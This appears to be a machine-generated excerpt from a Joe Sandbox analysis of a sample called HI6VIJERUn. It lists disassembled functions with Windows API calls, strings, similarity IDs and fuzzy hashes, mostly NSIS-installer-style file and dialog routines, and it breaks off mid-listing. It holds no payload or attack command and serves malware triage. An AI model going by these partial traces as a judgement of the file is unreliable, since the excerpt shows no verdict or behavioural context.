                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                          Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                          Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                          • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                          Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                          • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                                          Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                          • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                          Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                          • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                          • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                          • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                          Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                          • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                          • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                          • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                          • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                          Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
